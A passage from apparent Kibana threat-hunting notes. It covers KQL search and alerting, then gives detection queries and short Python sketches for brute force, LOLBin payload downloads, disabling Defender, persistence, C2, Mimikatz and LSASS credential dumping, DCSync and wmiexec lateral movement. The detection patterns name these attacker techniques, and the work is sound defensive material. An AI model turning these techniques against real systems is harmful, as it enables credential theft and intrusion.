Search Query:
 "United States" OR "England"
2- AND Operator
Here, we will use AND Operator to create a search that
will return the logs that contain the terms "UNITED
STATES" AND "Virginia."
Example Search Query:
 "United States" AND "Virginia"
3- NOT Operator
Similarly, we can use NOT Operator to remove the
particular term from the search results. This search query
will show the logs from the United States, including all
states but ignoring Florida.
Example Search Query:
 "United States" AND NOT ("Florida")
Field-based search
In the Field-based search, we will provide the field name
and the value we are looking for in the logs. This search
has a special syntax as    FIELD : VALUE .   It uses a
colon   :   as a separator between the field and the value.
Let's look at a few examples.
Example Search Query
 Source_ip : 238.163.231.224 AND UserName :
 Suleman
Explanation: We are telling Kibana to display all the
documents in which the field   Source_ip   contains the
value   238.163.231.224   and   UserName   is Suleman.
Searching With Range Queries
Range queries allow us to search for documents with field
values within a specified range.
Operators such as   greater than > or less than <         are
used in range queries to extract data within a specific
range.
Example query: search all data where
response_time_seconds       field is greater than or equal
to 100
 response_time_seconds >= 100
Another example: the below query returns Data Leak
events that have a severity level of 9 and up:
 severity_level >= 9 AND incident_type : Data
 Leak
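To make the combined range-and-term condition concrete, here is a Python sketch applying the same logic to a list of documents (the documents themselves are illustrative):

```python
# Sketch: apply the same range + term condition as the severity query
# above to in-memory documents. Field names mirror the query; the data
# is made up for illustration.
docs = [
    {"severity_level": 9, "incident_type": "Data Leak"},
    {"severity_level": 5, "incident_type": "Data Leak"},
    {"severity_level": 10, "incident_type": "Phishing"},
]
hits = [d for d in docs
        if d["severity_level"] >= 9 and d["incident_type"] == "Data Leak"]
print(len(hits))  # 1
```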
Another example: in the below query, we extract events
before 10/30/2023 where the affected system was either an
email or web server and the team member's name was AJohnston:
 @timestamp<"2023-10-30" AND
 affected_systems.system_type : email, web AND
 team_members.name : AJohnston
Data Visualization
The visualization tab allows us to visualize the data in
different forms like Table, Pie charts, Bar charts, etc.
This tab provides multiple options to create simple,
presentable visualizations.
Dashboards
Dashboards provide good visibility over the collected logs. A
user can create multiple dashboards to fulfil specific
needs.
     Click on Add from Library.
     Click on the visualizations and saved searches. It
     will be added to the dashboard.
     Once the items are added, adjust their size and
     placement accordingly.
     Don't forget to save the dashboard after completing
     it.
Creating Canvas with Kibana
Canvas allows users to control the visual appearance of
their data a lot more granularly, making it ideal for use in
presenting key insights derived from data. Unlike normal
presentations though, Canvas can be powered by live
datasets on Elasticsearch in real time.
Follow these instructions to create your first Canvas
presentation:
   1. Navigate to Canvas using the navigation menu and
      click on Create Workpad.
   2. Click on Add element, click on Chart, and then
      Metric. Click on the newly created element on the
       workpad to display its properties in the window on
       the right-hand side.
   3. Click on the Data tab for the selected element and
      click on Demo data to change the data source.
   4. Canvas supports a range of data sources.
      Elasticsearch SQL (SQL-like syntax) can be used to
       pull aggregated datasets while raw documents can
       be filtered and retrieved using the Elasticsearch
       documents option.
Creating Maps with Kibana
Elasticsearch comes with great support for geospatial data
out of the box.
Geo-point fields can hold a single geographic location
(latitude/longitude pair) while Geo-shape fields support
the encoding of arbitrary geoshapes (such as lines,
squares, polygons, and so on).
Geospatial data is useful (and rather common) in several
use cases. For example, logs containing public addresses
will often contain (or can be enriched with) geo-location
information for the corresponding host.
Example of geo-queries that can be used while working on
elastic search:
     geo_distance: finds docs containing a geo-point
     within a given distance from a specified
     geo_point .
     geo_bounding_box: finds docs with    geo-points
     falling inside a specified geographical boundary.
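To illustrate what a geo_distance filter computes conceptually, here is a haversine-distance sketch in Python (the real implementation is Elasticsearch's own; this only shows the underlying distance check):

```python
from math import radians, sin, cos, asin, sqrt

# Sketch: great-circle distance between two lat/lon points, the kind of
# check a geo_distance query performs. Earth radius ~6371 km.
def haversine_km(lat1, lon1, lat2, lon2):
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 \
        + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def within(point, ref, max_km):
    """Keep a doc if its geo-point lies within max_km of a reference."""
    return haversine_km(*point, *ref) <= max_km

print(within((51.5, -0.1), (51.5, -0.1), 1))  # True
```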
Follow these instructions to create your first map on
Kibana:
     Open the Maps app using the navigation menu and
     click on Create map. The default map includes a Road
     map base layer. Your blank map should look as
     follows:
     Maps can contain multiple layers, visualizing
     different bits of information. Click on the Add layer
     button to see the different types of layers you can
     add. Select the Documents layer type to visualize a
     geospatial field contained in Elasticsearch
     documents.
     Depending on which dataset you are working with,
     choose your dataset's data view as the data source and
     the desired field as the geospatial field. Click
     on Add layer to continue.
     You can now edit the layer properties to define the
     behavior of the layer, such as controlling and setting
     the names of the fields, adding tooltips, adding
     filters, etc.
Creating Alerts in Kibana
Kibana alerting is an integrated platform feature across all
solutions in Kibana. Security analysts, for example, can
use alerting to apply threat detection logic and the
appropriate response workflows to mitigate potential
issues. Engineering teams may use alerts to find
precursors to a potential outage and alert the on-call site
reliability engineer to take necessary action.
How Alerts Work in Kibana
Alerts in Kibana are defined by a rule. A rule determines
the logic behind an alert (condition), the interval at which
the condition should be checked (schedule), and the
response actions to be executed if the detection logic
returns any resulting data.
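The rule model described above (condition, schedule, actions) can be sketched in Python; all names here are illustrative and do not reflect Kibana's actual API:

```python
from dataclasses import dataclass, field
from typing import Callable, List

# Minimal sketch of a rule: a condition (detection query), a schedule
# interval, and actions fired when the condition returns data.
@dataclass
class Rule:
    condition: Callable[[], list]                 # detection logic
    interval_seconds: int                         # check schedule
    actions: List[Callable[[list], None]] = field(default_factory=list)

def check(rule: Rule) -> bool:
    """Run one scheduled evaluation; fire actions if results exist."""
    results = rule.condition()
    if results:
        for action in rule.actions:
            action(results)
        return True
    return False
```

A scheduler would call `check(rule)` every `rule.interval_seconds`, which is the loop Kibana's alerting framework handles for you.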
Creating Rules
Kibana supports different rule types, which can be
inspected at the below link:
 https://www.elastic.co/guide/en/kibana/8.0/rul
 e-types.html
Rules can be created by navigating to   Stack
Management   from the navigation menu and clicking on
Rules and Connectors .
A typical rule is set to check and run an Elasticsearch
query every 5 minutes and send a notification/alert when
the query returns more than a set number of results.
The query that will run varies depending on what you want
to monitor, but as an example, let's say you are
monitoring DNS requests and want to alert whenever an
endpoint attempts to query an external DNS server as this
may indicate malicious activity.
You could create a new rule with below KQL query:
 event.category:(network or network_traffic)
 and (event.type:connection or type:dns) and
 (destination.port:53 or
 event.dataset:zeek.dns) and source.ip:(
 10.0.0.0/8 or
 ... ) and not destination.ip:( 10.0.0.0/8 or
 ...)
Then select the index patterns; in this case, the indexes
should be   packetbeat   and   auditd .
Don't forget to change values according to your
environment.
Creating an Alert to Detect SSH Brute Force
A singular failed SSH authentication attempt is not
necessarily indicative of undesired or malicious activity.
However, 100 failed attempts within the span of 5 minutes
can indicate potential brute force activity and may be of
interest to a security analyst.
To achieve this, we would need to create a threshold
rule that fires once the count of failed SSH authentication
events crosses a set limit within the time window.
To test your rule, attempt to SSH into your Linux
web server with an incorrect username. Repeat the failed
attempt 20 times to simulate the detection and wait for
the detection to appear on the Alerts tab.
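Conceptually, the threshold condition such a rule evaluates can be sketched in Python as a sliding window over failed-login events (timestamps and IPs are illustrative):

```python
from collections import deque

# Sketch of the threshold logic: flag a source IP once it produces
# `limit` failed logins within `window` seconds. Events are
# (epoch_seconds, source_ip) tuples.
def detect_brute_force(events, window=300, limit=100):
    flagged, recent = set(), {}
    for ts, src in sorted(events):
        q = recent.setdefault(src, deque())
        q.append(ts)
        while ts - q[0] > window:   # drop attempts older than the window
            q.popleft()
        if len(q) >= limit:
            flagged.add(src)
    return flagged

events = [(t, "10.10.1.10") for t in range(100)]  # 100 failures in 100s
print(detect_brute_force(events))  # {'10.10.1.10'}
```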
Cyber Case Studies
When using the Elastic Stack in cyber security, we usually
have a dataset that, in most cases, represents logs and
events. The source of these logs can be Windows
machines, Linux machines, public web servers, etc.
It's important to correctly import these logs into Kibana in
order to use KQL to retrieve data and insights that can
be used in incident response and threat hunting.
Hunting SSH Brute Force Attempts
Brute-forcing attacks are focused on authentication
events, which generate several failed attempts before
successfully retrieving a valid credential.
Let's say we have imported logs from a Linux machine and
stored them under an index in Kibana named   Linux-logs .
Then, by specifying this index as the source, we can
execute the below query to retrieve failed login attempts:
 event.category: authentication AND
 system.auth.ssh.event: Failed
If we find a high number of counts from a specific IP
address such as   10.10.1.10 , we can then narrow
down the search to see if it got successful logins after
the failed attempts:
 event.category: authentication AND
 system.auth.ssh.event: Accepted AND source.ip:
 10.10.1.10
If we find logs satisfying the above query, it means that
the owner of the IP   10.10.1.10        has successfully
breached and logged in to the SSH server.
Hunting For Brute Force on Windows
If the target machine is Windows, then we can rely on Windows
event IDs to spot such attempts.
Using the below query, we can hunt for failed
authentication attempts. It would be good to create a
visualization table for this query and spot the username with
the highest count of this event.
 winlog.event_id: 4625
Then, after spotting the username, we can hunt for failed
authentication attempts generated by the user
malicious:
 winlog.event_id: 4625 AND user.name: malicious
To confirm if the user has successfully authenticated after
a potential brute-forcing attempt, we can replace the KQL
query with Event ID 4624
 winlog.event_id: 4624 AND user.name: malicious
To expand our investigation, we can then check the
processes spawned by this user inside the workstation
they got access to.
 host.name: host-1 AND winlog.event_id: 1 AND
 user.name: malicious
Hunting Directory Enumeration Attempts
Directory enumeration is the process of using automated
tools such as   gobuster   and     dirbuster   to list all
hidden and non-hidden directories on a web server. The
purpose is to have a complete map of the website
directories in order to conduct further attacks.
However, directory enumeration usually results in many
404   responses from the webserver for webpages that
don't exist. So if we hunt for these responses first and
narrow down which IP addresses have the highest
counts of such events, we get an initial list of IPs
suspected of conducting directory enumeration.
 network.protocol: http AND destination.port:
 80 AND http.response.status_code: 404
If we find IP addresses with high counts for the above
query, we can then use these IP addresses to find the
URLs they enumerated and received a 404 for from the
webserver:
 network.protocol: http AND destination.port:
 80 AND source.ip: 10.10.1.10 AND
 http.response.status_code: 404
If we want to see which directories were successfully
discovered by the attacker, we can change the query
to:
 network.protocol: http AND destination.port:
 80 AND source.ip: 10.10.1.10 AND
 http.response.status_code: (200 OR 301 OR 302)
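The triage logic above (counting 404s per source to shortlist suspects) can be sketched in Python; the log records are illustrative:

```python
from collections import Counter

# Sketch: count 404 responses per source IP; the sources with the
# highest counts become directory-enumeration suspects.
logs = [
    {"source_ip": "10.10.1.10", "status": 404},
    {"source_ip": "10.10.1.10", "status": 404},
    {"source_ip": "10.10.1.22", "status": 200},
]
counts = Counter(l["source_ip"] for l in logs if l["status"] == 404)
print(counts.most_common(1))  # [('10.10.1.10', 2)]
```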
Investigating Phishing Attacks
By using the following KQL query, we will hunt file
creations (Sysmon Event ID 11) generated by chrome.exe.
This can indicate successful downloads of email
attachments.
 process.name: chrome.exe AND winlog.event_id:
 11
Alternatively, we can hunt phishing attachments opened
using an Outlook client
 process.name: OUTLOOK.EXE AND winlog.event_id:
 11
Hunting Command Execution
Command execution usually happens when the attacker has
already compromised the machine and wants to download
further payloads
Command execution can be spotted by looking for the
below events:
     Suspicious usage of command-line tools
     through    powershell.exe          and   cmd.exe   to
     download and execute the staged payload
     Abuse of built-in system tools such as
      certutil.exe    or   bitsadmin.exe          for
     downloading the remote payload
     and   rundll32.exe    to run it
     Execution via programming/scripting tools such as
     Python's    os.system()        or PHP's    exec() .
By using the following KQL query, we will hunt process
creations (Sysmon Event ID 1) generated by
powershell.exe and cmd.exe
 winlog.event_id: 1 AND process.name: (cmd.exe
 OR powershell.exe)
An alternative way to hunt unusual PowerShell execution is
through the events generated by PowerShell's Script Block
Logging. We can use the following KQL syntax to list all
events generated by it:
  winlog.event_id: 4104
After retrieving the results, ensure that        "Set-
 StrictMode" is removed from            the results by clicking on
the - beside it in the filters.
Aside from manually reviewing the events generated
by PowerShell or Windows Command Prompt, known
strings used in cmd.exe or powershell.exe can also be
leveraged to determine unusual traffic.
Some examples of PowerShell strings are provided below:
 -   invoke / invoke-expression / iex
 -   -enc / -encoded
 -   -noprofile / -nop
 -   bypass
 -   -c / -command
 -   -executionpolicy / -ep
 -   WebRequest
 -   Download
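As a sketch of how these strings could be used programmatically, the following Python function flags command lines containing any of the suspicious substrings listed above (the token list and sample command lines are illustrative):

```python
# Sketch: flag command lines containing the suspicious PowerShell
# substrings listed above, matched case-insensitively.
SUSPICIOUS = ["invoke", "iex", "-enc", "-nop", "bypass",
              "-executionpolicy", "-ep", "webrequest", "download"]

def is_suspicious(command_line: str) -> bool:
    lowered = command_line.lower()
    return any(token in lowered for token in SUSPICIOUS)

print(is_suspicious("powershell -nop -w hidden -enc SQBFAFgA"))  # True
print(is_suspicious("powershell Get-Date"))                      # False
```

Substring matching like this is noisy on its own; in practice you would pair it with parent-process and network context as the notes describe.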
Hunting Command Execution Through Living Off The Land
Binaries
Aside from PowerShell and Command Prompt binaries,
other built-in binaries are also abused by threat actors to
execute malicious commands. Most of these binaries,
known as Living Off The Land Binaries (LOLBAS), are
documented on the LOLBAS project page. Using this resource, we can
hunt usage of built-in binaries (Certutil, Mshta, and
Regsvr32) and investigate unusual commands executed and
network connections initiated.
By using the following KQL query, we can hunt process
creation (Sysmon Event ID 1) as well as network
connection (Sysmon Event ID 3) events:
 winlog.event_id: (1 OR 3) AND (process.name:
 (mshta.exe OR certutil.exe OR regsvr32.exe) OR
 process.parent.name: (mshta.exe OR
 certutil.exe OR regsvr32.exe))
Hunting Command Execution Through Programming
Languages
Scripting and programming tools are typically found in
either workstations owned by software developers or
servers requiring these packages to run applications.
These tools are benign, but threat actors abuse their
functionalities to execute malicious code.
Given this, we will hunt for unusual events generated by
programming tools like Python, PHP and NodeJS.
We can use the following KQL query to hunt process
creation (Sysmon Event ID 1) and network connection
(Sysmon Event ID 3) events:
 winlog.event_id: (1 OR 3) AND (process.name:
 (*python* OR *php* OR *nodejs*) OR
 process.parent.name: (*python* OR *php* OR
 *nodejs*))
Hunting Defense Evasion Tactics: Disabling Windows
Defender
By using the following KQL query, we will hunt events
indicating an attempt to disable the running host antivirus:
 (*DisableRealtimeMonitoring* OR
 *RemoveDefinitions*)
     DisableRealtimeMonitoring - Commonly used with
     PowerShell's   Set-MPPreference     to disable its
     real-time monitoring.
     RemoveDefinitions - Commonly used with built-
     in   MpCmdRun.exe   to remove all existing signatures
     of Windows Defender.
Hunting Defense Evasion Tactics: Deleting Logs
The simplest way to detect the deletion of Windows
Event Logs is via Event ID 1102. These events are
always generated when a user attempts to delete
Windows Event Logs.
 winlog.event_id: 1102
Hunting Defense Evasion Tactics: Process Injection
To uncover process injection attempts, we can focus on
Sysmon's Event ID 8 (CreateRemoteThread), which
detects when a process creates a thread in another
process.
 winlog.event_id: 8
Hunting For Persistence: Scheduled Tasks
Scheduled tasks are commonly used to automate
commands and scripts to execute based on schedules or
triggers.
If Windows Advanced Audit Policy is properly configured,
we can use Event ID 4698 (Scheduled Task Creation).
Otherwise, we can use the following keywords for hunting
commands related to scheduled tasks in Kibana:
 (winlog.event_id: 4698 OR (*schtasks* OR
 *Register-ScheduledTask*))
Hunting For Persistence: Registry Key Changes
To detect persistence through Registry, we can focus on
the below registry keys:
     Software\Microsoft\Windows\CurrentVersion\Run
     (and RunOnce)
     Software\Microsoft\Windows\CurrentVersion\Explorer
     (Shell Folders and User Shell Folders)
 winlog.event_id: 13 AND winlog.channel:
 Microsoft-Windows-Sysmon/Operational AND
 registry.path: (*CurrentVersion\\Run* OR
 *CurrentVersion\\Explorer\\User* OR
 *CurrentVersion\\Explorer\\Shell*)
Additionally, we can extract changes made to the registry
by specifying the process name. The query below is to
look for registry modifications committed by   reg.exe   or
powershell.exe
 host.name: WKSTN-* AND winlog.event_id: 13 AND
 winlog.channel: Microsoft-Windows-
 Sysmon/Operational AND process.name: (reg.exe
 OR powershell.exe)
Hunting for Command & Control Communications: C2 over
DNS
C2 over DNS, or more accurately Command and Control
over DNS, is a technique used by adversaries
where DNS protocols are utilised to establish a Command
and Control channel. In this technique, adversaries can
disguise their C2 communications as typical DNS queries
and responses, bypassing network security measures.
We can focus on patterns such as:
     High count of unique subdomains
     Unusual DNS requests based on query types (MX,
     CNAME, TXT).
We can list all DNS queries and exclude all
reverse DNS lookups
 network.protocol: dns AND NOT
 dns.question.name: *arpa
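The "high count of unique subdomains" pattern above can be sketched in Python; the naive `base_domain()` split is an assumption (no public-suffix handling) and the domains are illustrative:

```python
from collections import Counter

# Sketch: count unique subdomains per registered domain; an unusually
# high count for a single domain can indicate DNS tunnelling.
queries = ["a1.evil.xyz", "b2.evil.xyz", "c3.evil.xyz", "www.example.com"]

def base_domain(fqdn: str) -> str:
    # Naive two-label split; real tooling should use a public-suffix list.
    return ".".join(fqdn.split(".")[-2:])

unique_subdomains = Counter(base_domain(q) for q in set(queries))
print(unique_subdomains["evil.xyz"])  # 3
```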
Hunting for Command & Control Communications: C2 Over
HTTPS
The notable thing about this technique is that attackers
use their own C2 domain, often with custom traffic
encryption over HTTP, showing the below common patterns:
      High count of HTTP traffic to distinctive domains
      High outbound HTTP bandwidth to unique domains
We can first hunt for outbound or egress HTTP requests
 network.protocol: http AND network.direction:
 egress
Based on the output, you will see a list of domains that
have been contacted over HTTP along with their counts.
You can then pick the domain with the highest counts and
investigate further:
 network.protocol: http AND network.direction:
 egress AND destination.domain: malicious.xyz
Then you will be able to identify all HTTP requests made to
this malicious domain, including any potential shells or
PHP files requested in GET requests.
Hunting Enumeration & Discovery Attempts
Enumeration involves identifying system and network
configurations, finding sensitive data, or identifying other
potential targets within the network.
To hunt such attempts, we may focus on discovering:
     Host reconnaissance activity
     Internal network scanning
     Active Directory enumeration
As such, we can build queries in Elasticsearch to
discover the use of the below tools:
     whoami.exe
     hostname.exe
     net.exe
     systeminfo.exe
     ipconfig.exe
     netstat.exe
     tasklist.exe
The example query below will hunt process creations
(Sysmon Event ID 1) generated by the above-mentioned
tools:
 winlog.event_id: 1 AND process.name:
 (whoami.exe OR hostname.exe OR net.exe OR
 systeminfo.exe OR ipconfig.exe OR netstat.exe
 OR tasklist.exe)
Note that the use of the above tools is not necessarily
malicious, as sysadmins use them to conduct
troubleshooting on the machines they manage. Therefore, it
is always useful to grab the parent process ID that
spawned these tools and dig deeper.
Example query is shown below:
 winlog.event_id: 1 AND process.pid: 7786
If you discover a strange parent process for the above
process (PID 7786), such as PowerShell spawning
cmd.exe, you can then assume it might be malicious.
Hunt for Unusual Network Scanning
Internal network connections are always presumed to be
benign due to the assumption that they originate from
legitimate host services and user activity. However,
threat actors tend to blend into this noise while
enumerating reachable assets for potential pivot points.
One example is scanning open ports on a reachable device,
which generates several connections to unique destination
ports.
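The "many unique destination ports from one source" signal can be sketched in Python; the event tuples and the threshold of 20 unique ports are illustrative:

```python
from collections import defaultdict

# Sketch: a source contacting many unique ports on one destination
# suggests a port scan. Events are (src_ip, dst_ip, dst_port) tuples.
events = [("10.0.0.5", "10.0.0.9", port) for port in range(1, 30)]

ports_seen = defaultdict(set)
for src, dst, port in events:
    ports_seen[(src, dst)].add(port)

scanners = {pair for pair, ports in ports_seen.items() if len(ports) > 20}
print(scanners)  # {('10.0.0.5', '10.0.0.9')}
```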
Depending on your internal network subnet IPs, you may
use the below query to hunt internal connections on known
ports:
 source.ip: 10.0.0.0/8 AND destination.ip:
 10.0.0.0/8 AND destination.port < 1024
If you find a high count towards a destination IP, such
as more than 800 counts, this means that the specified
destination IP is likely being scanned.
Your next step would be investigating what process is
responsible for these scan attempts.
Let's assume that the endpoint with destination IP
192.168.1.15   received the highest count of probes from
192.168.1.10 . Based on this assumption, we can build a
query to list all network connection events satisfying the
above criteria to find and uncover the responsible
process:
 winlog.event_id: 3 AND source.ip: 192.168.1.10
 AND destination.ip: 192.168.1.15 AND
 destination.port < 1024
Hunting Active Directory Enumeration
Domain Enumeration typically generates many LDAP
queries. However, it is also typical for an internal
network running Active Directory to generate this
activity. Given this, threat actors tend to blend into the
regular traffic to mask their suspicious activity of
harvesting Active Directory objects to tailor their potential
internal attack vectors.
Based on this, we may focus on unusual LDAP
connections. For example, we can build a query that
focuses on hunting processes that initiated an LDAP
network connection (port 389 for LDAP and port 636 for
LDAP over SSL).
 winlog.event_id: 3 AND source.ip: 10.0.0.0/8
 AND destination.ip: 10.0.0.0/8 AND
 destination.port: (389 OR 636) AND NOT
 process.name: mmc.exe
We have excluded    mmc.exe      from the query since this
process typically generates benign LDAP connections.
Hunting Privilege Escalation
Some of the methods we can follow to detect privilege
escalation are to look for signs of the below activities:
     Elevating access
     through SeImpersonatePrivilege abuse.
     Abusing excessive service permissions.
Additionally, successful privilege escalation attempts
always indicate activities generated by a privileged
account. In the context of abusing machine vulnerabilities,
the user access is typically elevated to the NT
Authority\System account on Windows endpoints. Given
this, we can attempt to hunt for processes executed by
low-privileged accounts that led to a SYSTEM account
access. In other words, we can hunt for processes
spawned by the SYSTEM account accompanied by a parent
process executed by a low-privileged account.
 winlog.event_id: 1 AND user.name: SYSTEM AND
 NOT winlog.event_data.ParentUser: "NT
 AUTHORITY\SYSTEM"
We have excluded events with a value of NT
AUTHORITY\SYSTEM on its ParentUser field since these
events do not indicate privilege escalation.
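The parent-user exclusion above can be sketched as a simple filter; the event records and executable names here are made up for illustration:

```python
# Sketch of the hunt above: keep process-creation events where the
# process runs as SYSTEM but the parent process ran as another user.
events = [
    {"user": "SYSTEM", "parent_user": "IIS APPPOOL\\web", "image": "spoofer.exe"},
    {"user": "SYSTEM", "parent_user": "NT AUTHORITY\\SYSTEM", "image": "svchost.exe"},
]

suspicious = [e for e in events
              if e["user"] == "SYSTEM"
              and e["parent_user"] != "NT AUTHORITY\\SYSTEM"]
print([e["image"] for e in suspicious])  # ['spoofer.exe']
```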
As an example, we might see an entry for a web server
account spawning a process running as the SYSTEM user.
To investigate further, we can take the executable name
(here,   spoofer.exe ) and investigate process creation
events to find out the parent process that spawned it and
examine whether it's malicious.
 winlog.event_id: 1 AND process.name:
 spoofer.exe
Aside from abusing account privileges, threat actors also
hunt for excessive permissions assigned to their current
account access. One example is excessive service
permissions allowing low-privileged users to modify and
restart services running on a privileged account context.
Given this, we can hunt for events abusing this behaviour
using Sysmon Event ID: 13 (Registry Value Set).
The KQL query below is focused on hunting registry
modifications on the services' ImagePath registry key,
which is the field that handles what binary will be
executed by the service.
 winlog.event_id: 13 AND registry.path:
 *HKLM\\System\\CurrentControlSet\\Services\\*\
 \ImagePath*
For example, we might see that the executable   update.exe
was set in the ImagePath of the service   SNMPTRAP , which
means that this service, when it starts, will load
update.exe . So if that executable is malicious, we
can confirm privilege escalation through service abuse.
If we want to confirm the execution of     update.exe
through the service, we can look for events satisfying the
below query:
 winlog.event_id: 1 AND process.parent.name:
 services.exe AND process.name: update.exe
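The two queries above can also be chained programmatically. The sketch below correlates an ImagePath change (Sysmon 13) with a later launch of the planted binary by the Service Control Manager (Sysmon 1). The registry.details field carrying the new ImagePath value is an assumption for illustration, and the sample events are invented.

```python
import ntpath

# Hypothetical sketch: link a service ImagePath modification to the actual
# execution of the planted binary by services.exe.

def confirm_service_abuse(events):
    # Binaries planted via ImagePath modifications (Sysmon Event ID 13).
    # "registry.details" is an assumed field holding the new ImagePath value.
    planted = {
        ntpath.basename(e["registry.details"])
        for e in events
        if e.get("winlog.event_id") == 13
        and e.get("registry.path", "").endswith("\\ImagePath")
    }
    # Of those, which were actually started by the Service Control Manager?
    return [
        e for e in events
        if e.get("winlog.event_id") == 1
        and e.get("process.parent.name") == "services.exe"
        and e.get("process.name") in planted
    ]

sample = [
    {"winlog.event_id": 13,
     "registry.path": r"HKLM\System\CurrentControlSet\Services\SNMPTRAP\ImagePath",
     "registry.details": r"C:\Windows\Temp\update.exe"},
    {"winlog.event_id": 1, "process.parent.name": "services.exe",
     "process.name": "update.exe"},
]
print([e["process.name"] for e in confirm_service_abuse(sample)])  # ['update.exe']
```

A hit from this correlation is stronger evidence than either event alone, since it shows the modified service definition was actually used to run the binary.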
Hunting Credential Harvesting
After gaining privileged access to a compromised host,
threat actors always tend to harvest more credentials and
use them to move laterally. One of the most prominent
examples is dumping LSASS credentials via Mimikatz.
Another way is simply creating a dump file of the
lsass.exe process, which contains in-memory credentials.
One of the best ways to start is to look for events
indicating the use of Mimikatz to dump credentials:
 winlog.event_id: 1 AND process.command_line:
 (*mimikatz* OR *DumpCreds* OR
 *privilege\:\:debug* OR *sekurlsa\:\:*)
As an alternative to Mimikatz, threat actors can use the
Task Manager to create a process dump of lsass.exe.
However, this technique also leaves traces, which
security analysts can leverage to detect it. By default,
dump files generated by the Task Manager are written to
the C:\Users\*\AppData\Local\Temp\ directory and
named using the format processname.DMP .
So we can hunt for file creation events involving
lsass.DMP :
 winlog.event_id: 11 AND file.path: *lsass.DMP
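The Mimikatz command-line indicators from the earlier query can be collapsed into one case-insensitive regex for triaging exported events, a minimal sketch:

```python
import re

# Sketch: case-insensitive regex mirroring the Mimikatz command-line
# wildcards from the query above.
MIMIKATZ_RE = re.compile(r"mimikatz|DumpCreds|privilege::debug|sekurlsa::", re.I)

def is_mimikatz_cmdline(cmdline):
    """Return True if a command line matches a known Mimikatz indicator."""
    return bool(MIMIKATZ_RE.search(cmdline))

print(is_mimikatz_cmdline('mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"'))  # True
print(is_mimikatz_cmdline("notepad.exe notes.txt"))  # False
```

Note that these are string indicators only; renamed or recompiled tooling will evade them, which is why the lsass.DMP file-creation hunt above is a useful complement.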
Moreover, DCSync attacks can be used to dump and
harvest credentials. DCSync abuses how domain
controllers in an Active Directory network communicate
and replicate data. Normally, domain controllers
synchronise directory information, including password
hashes, via the Directory Replication Service Remote
Protocol (MS-DRSR).
For reference, the replication request to a domain
controller requires the following privileges:
 - DS-Replication-Get-Changes (1131f6aa-9c07-
 11d1-f79f-00c04fc2dcd2)
 - DS-Replication-Get-Changes-All (1131f6ad-
 9c07-11d1-f79f-00c04fc2dcd2)
 - Replicating Directory Changes All (9923a32a-
 3607-11d2-b9be-0000f87a36b2)
 - Replicating Directory Changes In Filtered
 Set (89e95b76-444d-4c62-991a-0facbeda640c)
Note: Only Domain/Enterprise Admins and domain
controller machine accounts have these privileges by
default.
In the below query, we use event ID 4662 to hunt for
events related to Directory Service object access, since
we want to trace when a user attempts to access an Active
Directory Domain Services (AD DS) object. Moreover, we
have translated the privileges into their corresponding
GUID values and used them in
the winlog.event_data.Properties field. Lastly, we
have also added the AccessMask value of 0x100 (Control
Access). This value signifies that the user has enough
privileges to conduct the replication.
 winlog.event_id: 4662 AND
 winlog.event_data.AccessMask: 0x100 AND
 winlog.event_data.Properties: (*1131f6aa-9c07-
 11d1-f79f-00c04fc2dcd2* OR *1131f6ad-9c07-
 11d1-f79f-00c04fc2dcd2* OR *9923a32a-3607-
 11d2-b9be-0000f87a36b2* OR *89e95b76-444d-
 4c62-991a-0facbeda640c*)
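The same hunt can be expressed as a predicate over a single exported 4662 record, handy when triaging events outside of ELK. Field names follow the winlogbeat schema; the sample event is invented.

```python
# Sketch: the DCSync hunt as a predicate over one 4662 event.
DCSYNC_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "9923a32a-3607-11d2-b9be-0000f87a36b2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
)

def is_dcsync(event):
    """Return True if the event matches the DCSync replication pattern."""
    props = event.get("winlog.event_data.Properties", "").lower()
    return (event.get("winlog.event_id") == 4662
            and event.get("winlog.event_data.AccessMask") == "0x100"
            and any(guid in props for guid in DCSYNC_GUIDS))

sample = {"winlog.event_id": 4662,
          "winlog.event_data.AccessMask": "0x100",
          "winlog.event_data.Properties":
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
print(is_dcsync(sample))  # True
```

Any one of the replication GUIDs combined with the 0x100 access mask is enough to flag the event for review; legitimate hits should come only from domain controller machine accounts and Domain/Enterprise Admins.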
As can be seen below, the account backupadm has
executed domain replication actions such as syncing and
changing. This is suspicious because such actions are
only performed by privileged accounts and should not be
seen on other accounts. This raises the suspicion that
the account might have been compromised and used in a
DCSync attack to dump credentials.
To investigate this account further, we can hunt for
process creation events coming from this account:
 winlog.event_id: 1 AND user.name: backupadm
Hunting Lateral Movement
The hunt for lateral movement involves uncovering
suspicious authentication events and remote machine
access among a haystack of benign login attempts by
regular users. On a typical working day in an internal
network, events involving remote access to different
hosts and services are expected, be it access to a file
share, remote-access troubleshooting, or a network-wide
deployment of patches.
We can follow two approaches to detect lateral movement
attempts:
     Lateral Movement via WMI.
     Authentication via Pass-the-Hash.
WMI is widely used for system administration, monitoring,
configuration management, and automation tasks in
Windows environments. However, threat actors also use
this functionality to execute commands remotely and
establish access to remote targets. One standard indicator
of WMI's usage is the execution of the WmiPrvSE.exe
process. In addition, this process will spawn a child
process if WMI is used to execute commands remotely.
 winlog.event_id: 1 AND process.parent.name:
 WmiPrvSE.exe
It can be seen that WmiPrvSE.exe has spawned multiple
instances of cmd.exe , and the commands executed through
cmd.exe follow an unusual pattern: the output of the
executed commands is written to the ADMIN$ share
( C:\Windows\ ).
The pattern, cmd.exe /Q /c * \ 1>
 \\127.0.0.1\ADMIN$\* 2>&1 , is attributed to
Impacket's wmiexec.py, a known tool for lateral
movement.
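A minimal sketch of matching that wmiexec.py pattern against a command line, assuming the typical loopback-ADMIN$ redirection form:

```python
import re

# Sketch: regex for the wmiexec.py command pattern quoted above
# (output redirected to ADMIN$ via the loopback address).
WMIEXEC_RE = re.compile(
    r"cmd\.exe /Q /c .+ 1> \\\\127\.0\.0\.1\\ADMIN\$\\.+ 2>&1", re.I)

def is_wmiexec_cmdline(cmdline):
    """Return True if the command line matches the wmiexec.py redirection pattern."""
    return bool(WMIEXEC_RE.search(cmdline))

print(is_wmiexec_cmdline(
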